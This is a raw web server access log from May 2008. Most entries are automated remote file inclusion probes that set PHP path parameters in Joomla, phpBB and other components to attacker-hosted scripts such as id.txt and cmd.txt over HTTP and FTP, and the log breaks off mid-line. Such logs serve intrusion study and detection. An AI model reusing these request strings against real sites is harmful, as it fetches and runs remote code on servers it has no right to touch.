72.47.201.117 - - [24/May/2008:13:05:41 -0700] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:13:05:50 -0700] "GET /logs/access_080124.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:13:06:00 -0700] "GET /logs/access_080109.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:13:06:00 -0700] "GET /logs/access_080113.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:13:06:07 -0700] "GET /logs/access_080110.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.201.117 - - [24/May/2008:13:06:11 -0700] "GET /logs/access_080421.log//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:13:06:19 -0700] "GET /logs/access_080123.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:13:06:19 -0700] "GET /logs/access_071215.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.184.171.65 - - [24/May/2008:13:06:28 -0700] "GET /logs/trans.php?trans=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
12.184.171.65 - - [24/May/2008:13:06:28 -0700] "GET /trans.php?trans=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:13:06:36 -0700] "GET /logs/access_080212.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:13:06:38 -0700] "GET /logs/access_071220.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.4.210 - - [24/May/2008:13:06:58 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp:/84.32.137.157/incoming/upload/trex/index.php?option=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
58.26.137.64 - - [24/May/2008:13:07:35 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [24/May/2008:13:07:35 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
65.36.252.34 - - [24/May/2008:13:07:39 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.36.252.34 - - [24/May/2008:13:07:39 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.84.182.98 - - [24/May/2008:13:07:49 -0700] "GET /logs/access_080225.log//main.php?sayfa=http://kecebong.justfree.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
12.184.171.65 - - [24/May/2008:13:08:17 -0700] "GET /logs/senetman/html/index.php?page=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
12.184.171.65 - - [24/May/2008:13:08:17 -0700] "GET /logs/senetman/html/index.php?page=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
12.184.171.65 - - [24/May/2008:13:08:17 -0700] "GET /senetman/html/index.php?page=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
12.184.171.65 - - [24/May/2008:13:08:18 -0700] "GET /senetman/html/index.php?page=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.188.13 - - [24/May/2008:13:08:30 -0700] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.19.188.13 - - [24/May/2008:13:08:30 -0700] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.230.197.245 - - [24/May/2008:13:09:00 -0700] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://gsis.bogo.net/bbs/tes.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.209.176 - - [24/May/2008:13:09:18 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://fizwig.fizwig.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
70.84.182.98 - - [24/May/2008:13:09:19 -0700] "GET //main.php?sayfa=http://kecebong.justfree.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.209.176 - - [24/May/2008:13:09:30 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://fizwig.fizwig.com/test.txt? HTTP/1.1" 200 11607 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
217.67.26.84 - - [24/May/2008:13:09:37 -0700] "GET /logs/sub.php?s=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [24/May/2008:13:09:37 -0700] "GET /sub.php?s=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.211.242 - - [24/May/2008:13:09:42 -0700] "GET /logs/access.log/trans.php?trans=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:13:09:56 -0700] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:13:09:56 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:13:09:56 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.136.6.38 - - [24/May/2008:13:10:12 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
193.136.6.38 - - [24/May/2008:13:10:13 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:13:10:14 -0700] "GET /logs/access_080226.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [24/May/2008:13:10:19 -0700] "GET /logs/access.log//modules/My_eGallery/index.php?basepath=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:13:10:25 -0700] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:13:10:25 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:13:10:25 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.136.6.38 - - [24/May/2008:13:10:29 -0700] "GET /logs//config.inc.php?config%5broot_dir%5d=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
193.136.6.38 - - [24/May/2008:13:10:29 -0700] "GET //config.inc.php?config%5broot_dir%5d=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
84.243.253.159 - - [24/May/2008:13:10:41 -0700] "GET /logs/sub.php?s=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [24/May/2008:13:10:41 -0700] "GET /sub.php?s=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:13:10:46 -0700] "GET /logs/access_071221.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.136.6.38 - - [24/May/2008:13:10:48 -0700] "GET /language.php?rootdir=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
193.136.6.38 - - [24/May/2008:13:10:52 -0700] "GET /logs/language.php?rootdir=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
72.37.217.226 - - [24/May/2008:13:10:57 -0700] "GET /logs/access_080326.log//bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path=http://kiliclub.com/tmp/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.119.240.143 - - [24/May/2008:13:10:59 -0700] "GET /logs/access_080401.log//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [24/May/2008:13:11:14 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_letterman&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
193.136.6.38 - - [24/May/2008:13:11:15 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_letterman&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 200 50 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
66.230.197.245 - - [24/May/2008:13:11:47 -0700] "GET /logs/access.log//index.php?_SERVER[DOCUMENT_ROOT]=http://gsis.bogo.net/bbs/tes.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [24/May/2008:13:11:47 -0700] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://gsis.bogo.net/bbs/tes.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.72.211.242 - - [24/May/2008:13:12:14 -0700] "GET /logs/sub.php?s=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.72.211.242 - - [24/May/2008:13:12:14 -0700] "GET /sub.php?s=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.37.217.226 - - [24/May/2008:13:12:33 -0700] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://kiliclub.com/tmp/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.9.129.6 - - [24/May/2008:13:12:35 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.villa-bizarro.nl/tools/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.9.129.6 - - [24/May/2008:13:12:35 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.villa-bizarro.nl/tools/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.9.129.6 - - [24/May/2008:13:12:35 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.villa-bizarro.nl/tools/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.36.252.34 - - [24/May/2008:13:13:25 -0700] "GET /logs/access_080313.log/components/com_performs/performs.php?mosConfig_absolute_path=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.138.224.8 - - [24/May/2008:13:13:37 -0700] "GET /logs/access_080215.log/index.php?redir=http://www.b470-killer.kit.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.138.224.8 - - [24/May/2008:13:13:37 -0700] "GET /logs/index.php?redir=http://www.b470-killer.kit.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.138.224.8 - - [24/May/2008:13:14:16 -0700] "GET /logs/access_080116.log/index.php?redir=http://www.b470-killer.kit.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.209.176 - - [24/May/2008:13:15:25 -0700] "GET /logs/!scanhttp://fizwig.fizwig.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
87.106.209.176 - - [24/May/2008:13:15:25 -0700] "GET /!scanhttp://fizwig.fizwig.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:13:15:48 -0700] "GET /logs//ws/login.php?includedir=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:13:15:51 -0700] "GET //ws/login.php?includedir=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.29.233 - - [24/May/2008:13:16:13 -0700] "GET /presto/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.103.23.40 - - [24/May/2008:13:17:30 -0700] "GET /logs/access_071218.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.tenis-prerov.cz/albums/Kanar07/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [24/May/2008:13:17:30 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.tenis-prerov.cz/albums/Kanar07/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [24/May/2008:13:17:31 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.tenis-prerov.cz/albums/Kanar07/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.146.133.138 - - [24/May/2008:13:17:59 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.146.133.138 - - [24/May/2008:13:17:59 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.traderscorporation.com/fuckrox-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.146.133.138 - - [24/May/2008:13:18:00 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.146.133.138 - - [24/May/2008:13:18:00 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.traderscorporation.com/fuckrox-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:13:18:30 -0700] "GET /logs/access_080218.log//skin/zero_vote/error.php?dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.213.30 - - [24/May/2008:13:18:33 -0700] "GET /logs/access_080313.log HTTP/1.0" 200 491234 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
72.37.217.226 - - [24/May/2008:13:19:12 -0700] "GET /logs/access_071219.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://kiliclub.com/tmp/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.37.217.226 - - [24/May/2008:13:19:12 -0700] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://kiliclub.com/tmp/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.72.211.242 - - [24/May/2008:13:19:18 -0700] "GET /logs/access_080301.log/trans.php?trans=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:13:19:56 -0700] "GET /logs/access_080218.log//skin/zero_vote/ask_password.php?dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.188.13 - - [24/May/2008:13:20:07 -0700] "GET /logs//calendar//tools/errors.php?error=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.19.188.13 - - [24/May/2008:13:20:08 -0700] "GET //calendar//tools/errors.php?error=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.62.80.134 - - [24/May/2008:13:20:12 -0700] "GET /logs/index.php?openFile=INTERNAL&Library=LOCAL&Action=mainFrame&randString=1209994070.95&clientScreenMetrics%5BWidth%5D=1600&clientScreenMetrics%5BHeight%5D=1200&clientScreenMetrics%5BAvailWidth%5D=undefined&clientScreenMetrics%5BAvailHeight%5D=undefined&clientScreenMetrics%5BColorDepth%5D=undefined&clientScreenMetrics%5BPixelDepth%5D=undefinedhttp://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
209.62.80.134 - - [24/May/2008:13:20:16 -0700] "GET /index.php?openFile=INTERNAL&Library=LOCAL&Action=mainFrame&randString=1209994070.95&clientScreenMetrics%5BWidth%5D=1600&clientScreenMetrics%5BHeight%5D=1200&clientScreenMetrics%5BAvailWidth%5D=undefined&clientScreenMetrics%5BAvailHeight%5D=undefined&clientScreenMetrics%5BColorDepth%5D=undefined&clientScreenMetrics%5BPixelDepth%5D=undefinedhttp://justbarelylegal.com/ct/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
12.184.171.65 - - [24/May/2008:13:21:16 -0700] "GET /logs/sub.php?s=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
12.184.171.65 - - [24/May/2008:13:21:17 -0700] "GET /sub.php?s=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.234.200.124 - - [24/May/2008:13:21:31 -0700] "GET /logs/access_080313.log/components/com_performs/performs.php?mosConfig_absolute_path=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.74.194 - - [24/May/2008:13:21:39 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://mildnet-scan.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
195.138.224.8 - - [24/May/2008:13:21:43 -0700] "GET /oneadmin/config.php?path[docroot]=http://www.b470-killer.kit.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.74.194 - - [24/May/2008:13:21:44 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://mildnet-scan.sitesled.com/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
64.15.159.42 - - [24/May/2008:13:21:47 -0700] "GET /logs/access_080401.log//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://bethshemuel.com/cache/cmdAsc[1].txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.62.80.134 - - [24/May/2008:13:24:13 -0700] "GET /logs//withupgrades/admin/index.php?name=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
209.62.80.134 - - [24/May/2008:13:24:13 -0700] "GET //withupgrades/admin/index.php?name=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
75.126.114.42 - - [24/May/2008:13:24:37 -0700] "GET /contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.146.133.138 - - [24/May/2008:13:24:40 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.146.133.138 - - [24/May/2008:13:24:41 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.146.133.138 - - [24/May/2008:13:24:41 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.37.217.226 - - [24/May/2008:13:24:55 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
89.107.66.224 - - [24/May/2008:13:25:12 -0700] "GET /logs/access.log/modules/xfsection/modify.php?dir_module=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.107.66.224 - - [24/May/2008:13:25:12 -0700] "GET /modules/xfsection/modify.php?dir_module=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.107.66.224 - - [24/May/2008:13:25:12 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:13:25:31 -0700] "GET /logs/access_080327.log//skin/zero_vote/ask_password.php?dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.226.64.33 - - [24/May/2008:13:25:57 -0700] "GET //withupgrades/admin/index.php?name=http://h1.ripway.com/kenthu/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
66.226.64.33 - - [24/May/2008:13:25:57 -0700] "GET /logs//withupgrades/admin/index.php?name=http://h1.ripway.com/kenthu/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
89.107.66.224 - - [24/May/2008:13:26:55 -0700] "GET /logs/access_080201.log/modules/xfsection/modify.php?dir_module=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.19.188.13 - - [24/May/2008:13:27:00 -0700] "GET /logs/access_080325.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.19.188.13 - - [24/May/2008:13:27:00 -0700] "GET /components/com_colorlab/admin.color.php?mosConf